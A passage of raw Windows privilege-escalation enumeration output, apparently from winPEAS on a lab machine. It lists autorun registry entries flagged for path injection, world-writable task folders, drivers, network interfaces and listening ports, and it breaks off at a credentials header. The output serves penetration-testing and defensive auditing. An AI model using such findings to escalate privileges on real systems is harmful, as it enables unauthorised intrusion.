File: C:\Windows\system32\userinit.exe,
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Key: Shell
Folder: None (PATH Injection)
File: explorer.exe
=================================================================================================
RegPath: HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
Key: AlternateShell
Folder: None (PATH Injection)
File: cmd.exe
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Font Drivers
Key: Adobe Type Manager
Folder: None (PATH Injection)
File: atmfd.dll
=================================================================================================
RegPath: HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers
Key: Adobe Type Manager
Folder: None (PATH Injection)
File: atmfd.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: midimapper
Folder: None (PATH Injection)
File: midimap.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.imaadpcm
Folder: None (PATH Injection)
File: imaadp32.acm
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.l3acm
Folder: C:\Windows\System32
File: C:\Windows\System32\l3codeca.acm
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.msadpcm
Folder: None (PATH Injection)
File: msadp32.acm
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.msg711
Folder: None (PATH Injection)
File: msg711.acm
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.msgsm610
Folder: None (PATH Injection)
File: msgsm32.acm
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.i420
Folder: None (PATH Injection)
File: iyuv_32.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.iyuv
Folder: None (PATH Injection)
File: iyuv_32.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.mrle
Folder: None (PATH Injection)
File: msrle32.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.msvc
Folder: None (PATH Injection)
File: msvidc32.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.uyvy
Folder: None (PATH Injection)
File: msyuv.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.yuy2
Folder: None (PATH Injection)
File: msyuv.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.yvu9
Folder: None (PATH Injection)
File: tsbyuv.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.yvyu
Folder: None (PATH Injection)
File: msyuv.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: wavemapper
Folder: None (PATH Injection)
File: msacm32.drv
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: midimapper
Folder: None (PATH Injection)
File: midimap.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.imaadpcm
Folder: None (PATH Injection)
File: imaadp32.acm
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.l3acm
Folder: C:\Windows\SysWOW64
File: C:\Windows\SysWOW64\l3codeca.acm
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.msadpcm
Folder: None (PATH Injection)
File: msadp32.acm
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.msg711
Folder: None (PATH Injection)
File: msg711.acm
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: msacm.msgsm610
Folder: None (PATH Injection)
File: msgsm32.acm
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.cvid
Folder: None (PATH Injection)
File: iccvid.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.i420
Folder: None (PATH Injection)
File: iyuv_32.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.iyuv
Folder: None (PATH Injection)
File: iyuv_32.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.mrle
Folder: None (PATH Injection)
File: msrle32.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.msvc
Folder: None (PATH Injection)
File: msvidc32.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.uyvy
Folder: None (PATH Injection)
File: msyuv.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.yuy2
Folder: None (PATH Injection)
File: msyuv.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.yvu9
Folder: None (PATH Injection)
File: tsbyuv.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: vidc.yvyu
Folder: None (PATH Injection)
File: msyuv.dll
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32
Key: wavemapper
Folder: None (PATH Injection)
File: msacm32.drv
=================================================================================================
RegPath: HKLM\Software\Classes\htmlfile\shell\open\command
Folder: C:\Program Files\Internet Explorer
File: C:\Program Files\Internet Explorer\iexplore.exe %1 (Unquoted and Space detected)
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: _wow64cpu
Folder: None (PATH Injection)
File: wow64cpu.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: _wowarmhw
Folder: None (PATH Injection)
File: wowarmhw.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: _xtajit
Folder: None (PATH Injection)
File: xtajit.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: advapi32
Folder: None (PATH Injection)
File: advapi32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: clbcatq
Folder: None (PATH Injection)
File: clbcatq.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: combase
Folder: None (PATH Injection)
File: combase.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: COMDLG32
Folder: None (PATH Injection)
File: COMDLG32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: coml2
Folder: None (PATH Injection)
File: coml2.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: DifxApi
Folder: None (PATH Injection)
File: difxapi.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: gdi32
Folder: None (PATH Injection)
File: gdi32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: gdiplus
Folder: None (PATH Injection)
File: gdiplus.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: IMAGEHLP
Folder: None (PATH Injection)
File: IMAGEHLP.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: IMM32
Folder: None (PATH Injection)
File: IMM32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: kernel32
Folder: None (PATH Injection)
File: kernel32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: MSCTF
Folder: None (PATH Injection)
File: MSCTF.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: MSVCRT
Folder: None (PATH Injection)
File: MSVCRT.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: NORMALIZ
Folder: None (PATH Injection)
File: NORMALIZ.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: NSI
Folder: None (PATH Injection)
File: NSI.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: ole32
Folder: None (PATH Injection)
File: ole32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: OLEAUT32
Folder: None (PATH Injection)
File: OLEAUT32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: PSAPI
Folder: None (PATH Injection)
File: PSAPI.DLL
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: rpcrt4
Folder: None (PATH Injection)
File: rpcrt4.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: sechost
Folder: None (PATH Injection)
File: sechost.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: Setupapi
Folder: None (PATH Injection)
File: Setupapi.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: SHCORE
Folder: None (PATH Injection)
File: SHCORE.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: SHELL32
Folder: None (PATH Injection)
File: SHELL32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: SHLWAPI
Folder: None (PATH Injection)
File: SHLWAPI.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: user32
Folder: None (PATH Injection)
File: user32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: WLDAP32
Folder: None (PATH Injection)
File: WLDAP32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: wow64
Folder: None (PATH Injection)
File: wow64.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: wow64win
Folder: None (PATH Injection)
File: wow64win.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: WS2_32
Folder: None (PATH Injection)
File: WS2_32.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}
Key: StubPath
Folder: \
FolderPerms: Users [AppendData/CreateDirectories]
File: /UserInstall
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}
Key: StubPath
Folder: C:\windows\system32
File: C:\windows\system32\unregmp2.exe /FirstLogon
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}
Key: StubPath
Folder: None (PATH Injection)
File: U
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}
Key: StubPath
Folder: C:\Windows\System32
File: C:\Windows\System32\ie4uinit.exe -UserConfig
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
Key: StubPath
Folder: C:\Windows\System32
File: C:\Windows\System32\Rundll32.exe C:\Windows\System32\mscories.dll,Install
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}
Key: StubPath
Folder: C:\Program Files (x86)\Microsoft\Edge\Application\84.0.522.48\Installer
File: C:\Program Files (x86)\Microsoft\Edge\Application\84.0.522.48\Installer\setup.exe --configure-user-settings --verbose-logging --system-level (Unquoted and Space detected)
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}
Key: StubPath
Folder: C:\Windows\System32
File: C:\Windows\System32\rundll32.exe C:\Windows\System32\iesetup.dll,IEHardenAdmin
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{A509B1A8-37EF-4b3f-8CFC-4F3A74704073}
Key: StubPath
Folder: C:\Windows\System32
File: C:\Windows\System32\rundll32.exe C:\Windows\System32\iesetup.dll,IEHardenUser
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}
Key: StubPath
Folder: C:\windows\system32
File: C:\windows\system32\unregmp2.exe /FirstLogon
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
Key: StubPath
Folder: C:\Windows\SysWOW64
File: C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}
Key: StubPath
Folder: C:\Windows\SysWOW64
File: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\iesetup.dll,IEHardenAdmin
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{A509B1A8-37EF-4b3f-8CFC-4F3A74704073}
Key: StubPath
Folder: C:\Windows\SysWOW64
File: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\iesetup.dll,IEHardenUser
=================================================================================================
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected)
=================================================================================================
Folder: C:\Users\MichelleWat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
FolderPerms: MichelleWat [AllAccess]
File: C:\Users\MichelleWat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected)
FilePerms: MichelleWat [AllAccess]
=================================================================================================
Folder: C:\windows\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
=================================================================================================
Folder: C:\windows\system32\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
=================================================================================================
Folder: C:\windows
File: C:\windows\system.ini
=================================================================================================
Folder: C:\windows
File: C:\windows\win.ini
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ Scheduled Applications --Non Microsoft--
È Check if you can modify other users scheduled binaries https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
ÉÍÍÍÍÍÍÍÍÍ͹ Device Drivers --Non Microsoft--
È Check 3rd party drivers for known vulnerabilities/rootkits. https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#vulnerable-drivers
XENBUS - 8.2.7.58 [Amazon Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\xenbus.sys
XEN - 8.2.7.58 [Amazon Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\xen.sys
XENFILT - 8.2.7.58 [Amazon Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\xenfilt.sys
QLogic Gigabit Ethernet - 7.12.31.105 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxvbda.sys
QLogic 10 GigE - 7.13.65.105 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\evbda.sys
QLogic FastLinQ Ethernet - 8.33.20.103 [Cavium, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qevbda.sys
NVIDIA nForce(TM) RAID Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvraid.sys
VMware PCI VMCI Bus Device - 9.8.16.0 build-14168184 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmci.sys
Intel Matrix Storage Manager driver - 8.6.2.1019 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorV.sys
Promiser SuperTrak EX Series - 5.1.0000.10 [Promise Technology, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\stexstor.sys
LSI 3ware RAID Controller - WindowsBlue [LSI]: \\.\GLOBALROOT\SystemRoot\System32\drivers\3ware.sys
AHCI 1.3 Device Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsata.sys
Storage Filter Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdxata.sys
AMD Technology AHCI Compatible Controller - 3.7.1540.43 [AMD Technologies Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsbs.sys
Adaptec RAID Controller - 7.5.0.32048 [PMC-Sierra, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\arcsas.sys
Windows (R) Win 7 DDK driver - 10.0.10011.16384 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ItSas35i.sys
LSI Fusion-MPT SAS Driver (StorPort) - 1.34.03.83 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas.sys
Windows (R) Win 7 DDK driver - 10.0.10011.16384 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas2i.sys
Windows (R) Win 7 DDK driver - 10.0.10011.16384 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas3i.sys
LSI SSS PCIe/Flash Driver (StorPort) - 2.10.61.81 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sss.sys
MEGASAS RAID Controller Driver for Windows - 6.706.06.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas.sys
MEGASAS RAID Controller Driver for Windows - 6.714.05.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\MegaSas2i.sys
MEGASAS RAID Controller Driver for Windows - 7.705.08.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas35i.sys
MegaRAID Software RAID - 15.02.2013.0129 [LSI Corporation, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasr.sys
Marvell Flash Controller - 1.0.5.1016 [Marvell Semiconductor, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\mvumis.sys
NVIDIA nForce(TM) SATA Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvstor.sys
MEGASAS RAID Controller Driver for Windows - 6.805.03.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas2i.sys
MEGASAS RAID Controller Driver for Windows - 6.604.06.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas3i.sys
Microsoftr Windowsr Operating System - 2.60.01 [Silicon Integrated Systems Corp.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SiSRaid2.sys
Microsoftr Windowsr Operating System - 6.1.6918.0 [Silicon Integrated Systems]: \\.\GLOBALROOT\SystemRoot\System32\drivers\sisraid4.sys
VIA RAID driver - 7.0.9600,6352 [VIA Technologies Inc.,Ltd]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vsmraid.sys
VIA StorX RAID Controller Driver - 8.0.9200.8110 [VIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vstxraid.sys
Chelsio Communications iSCSI Controller - 10.0.10011.16384 [Chelsio Communications]: \\.\GLOBALROOT\SystemRoot\System32\drivers\cht4sx64.sys
Intel(R) Rapid Storage Technology driver (inbox) - 15.44.0.1010 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorAVC.sys
QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bfadfcoei.sys
Emulex WS2K12 Storport Miniport Driver x64 - 11.0.247.8000 01/26/2016 WS2K12 64 bit x64 [Emulex]: \\.\GLOBALROOT\SystemRoot\System32\drivers\elxfcoe.sys
Emulex WS2K12 Storport Miniport Driver x64 - 11.4.225.8009 11/15/2017 WS2K12 64 bit x64 [Broadcom]: \\.\GLOBALROOT\SystemRoot\System32\drivers\elxstor.sys
QLogic iSCSI offload driver - 8.33.5.2 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qeois.sys
QLogic Fibre Channel Stor Miniport Driver - 9.1.15.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ql2300i.sys
QLA40XX iSCSI Host Bus Adapter - 2.1.5.0 (STOREx wx64) [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ql40xx2i.sys
QLogic FCoE Stor Miniport Inbox Driver - 9.1.11.3 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qlfcoei.sys
XENVBD - 8.3.1.56 [Amazon Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\xenvbd.sys
XENCRSH - 8.3.1.56 [Amazon Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\xencrsh.sys
Amazon NVMe Storage Driver - V1.3.2 [Amazon]: \\.\GLOBALROOT\SystemRoot\System32\drivers\AWSNVMe.sys
QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bfadi.sys
PMC-Sierra HBA Controller - 1.3.0.10769 [PMC-Sierra]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ADP80XX.SYS
Smart Array SAS/SATA Controller Media Driver - 8.0.4.0 Build 1 Media Driver (x86-64) [Hewlett-Packard Company]: \\.\GLOBALROOT\SystemRoot\System32\drivers\HpSAMD.sys
SmartRAID, SmartHBA PQI Storport Driver - 1.50.0.0 [Microsemi Corportation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SmartSAMD.sys
QLogic FCoE offload driver - 8.33.4.2 [Cavium, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qefcoe.sys
QLogic iSCSI offload driver - 7.14.7.2 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxois.sys
QLogic FCoE Offload driver - 7.14.15.2 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxfcoe.sys
XENVIF - 8.2.8.27 [Amazon Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\xenvif.sys
XENIFACE - 8.2.5.39 [Amazon Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\xeniface.sys
XENNET - 8.2.5.32 [Amazon Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\xennet.sys
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Network Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Network Shares
[X] Exception: Access denied
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerate Network Mapped Drives (WMI)
ÉÍÍÍÍÍÍÍÍÍ͹ Host File
ÉÍÍÍÍÍÍÍÍÍ͹ Network Ifaces and known hosts
È The masks are only for the IPv4 addresses
Ethernet[02:89:25:66:2C:0D]: 10.10.242.97, fe80::385b:3ba3:a213:500a%9 / 255.255.0.0
Gateways: 10.10.0.1
DNSs: 10.0.0.2
Known hosts:
10.10.0.1 02-C8-85-B5-5A-AA Dynamic
10.10.255.255 FF-FF-FF-FF-FF-FF Static
172.30.16.1 00-00-00-00-00-00 Invalid
224.0.0.22 01-00-5E-00-00-16 Static
224.0.0.251 01-00-5E-00-00-FB Static
224.0.0.252 01-00-5E-00-00-FC Static
255.255.255.255 FF-FF-FF-FF-FF-FF Static
Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
Known hosts:
224.0.0.22 00-00-00-00-00-00 Static
ÉÍÍÍÍÍÍÍÍÍ͹ Current TCP Listening Ports
È Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 80 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 135 0.0.0.0 0 Listening 988 svchost
TCP 0.0.0.0 443 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 2805 0.0.0.0 0 Listening 5060 Veeam.One.Agent.Service
TCP 0.0.0.0 3389 0.0.0.0 0 Listening 764 svchost
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49664 0.0.0.0 0 Listening 692 wininit
TCP 0.0.0.0 49665 0.0.0.0 0 Listening 1064 svchost
TCP 0.0.0.0 49666 0.0.0.0 0 Listening 788 lsass
TCP 0.0.0.0 49667 0.0.0.0 0 Listening 852 svchost
TCP 0.0.0.0 49669 0.0.0.0 0 Listening 1340 spoolsv
TCP 0.0.0.0 49670 0.0.0.0 0 Listening 772 services
TCP 10.10.242.97 139 0.0.0.0 0 Listening 4 System
TCP 10.10.242.97 2805 10.10.242.97 49719 Established 5060 Veeam.One.Agent.Service
Enumerating IPv6 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP [::] 80 [::] 0 Listening 4 System
TCP [::] 135 [::] 0 Listening 988 svchost
TCP [::] 443 [::] 0 Listening 4 System
TCP [::] 445 [::] 0 Listening 4 System
TCP [::] 3389 [::] 0 Listening 764 svchost
TCP [::] 5985 [::] 0 Listening 4 System
TCP [::] 47001 [::] 0 Listening 4 System
TCP [::] 49664 [::] 0 Listening 692 wininit
TCP [::] 49665 [::] 0 Listening 1064 svchost
TCP [::] 49666 [::] 0 Listening 788 lsass
TCP [::] 49667 [::] 0 Listening 852 svchost
TCP [::] 49669 [::] 0 Listening 1340 spoolsv
TCP [::] 49670 [::] 0 Listening 772 services
ÉÍÍÍÍÍÍÍÍÍ͹ Current UDP Listening Ports
È Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address:Remote Port Process ID Process Name
UDP 0.0.0.0 123 *:* 2148 svchost
UDP 0.0.0.0 500 *:* 852 svchost
UDP 0.0.0.0 3389 *:* 764 svchost
UDP 0.0.0.0 4500 *:* 852 svchost
UDP 0.0.0.0 5353 *:* 1312 svchost
UDP 0.0.0.0 5355 *:* 1312 svchost
UDP 10.10.242.97 137 *:* 4 System
UDP 10.10.242.97 138 *:* 4 System
UDP 127.0.0.1 52950 *:* 852 svchost
Enumerating IPv6 connections
Protocol Local Address Local Port Remote Address:Remote Port Process ID Process Name
UDP [::] 123 *:* 2148 svchost
UDP [::] 500 *:* 852 svchost
UDP [::] 3389 *:* 764 svchost
UDP [::] 4500 *:* 852 svchost
UDP [::] 5353 *:* 1312 svchost
UDP [::] 5355 *:* 1312 svchost
ÉÍÍÍÍÍÍÍÍÍ͹ Firewall Rules
È Showing only DENY rules (too many ALLOW rules always)
Current Profiles: PUBLIC
FirewallEnabled (Domain): True
FirewallEnabled (Private): True
FirewallEnabled (Public): True
DENY rules:
[X] Exception: Object reference not set to an instance of an object.
ÉÍÍÍÍÍÍÍÍÍ͹ DNS cached --limit 70--
Entry Name Data
[X] Exception: Access denied
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Internet settings, zone and proxy configuration
General Settings
Hive Key Value
HKCU DisableCachingOfSSLPages 1
HKCU IE5_UA_Backup_Flag 5.0
HKCU PrivacyAdvanced 1
HKCU SecureProtocols 2688
HKCU User Agent Mozilla/4.0 (compatible; MSIE 8.0; Win32)
HKCU CertificateRevocation 1
HKCU ZonesSecurityUpgrade System.Byte[]
HKCU EnableNegotiate 1
HKCU MigrateProxy 1
HKCU ProxyEnable 0
HKCU WarnonZoneCrossing 1
HKLM ActiveXCache C:\Windows\Downloaded Program Files
HKLM CodeBaseSearchPath CODEBASE
HKLM EnablePunycode 1
HKLM MinorVersion 0
HKLM WarnOnIntranet 1
Zone Maps
No URLs configured
Zone Auth Settings
No Zone Auth Settings
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Windows Credentials ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
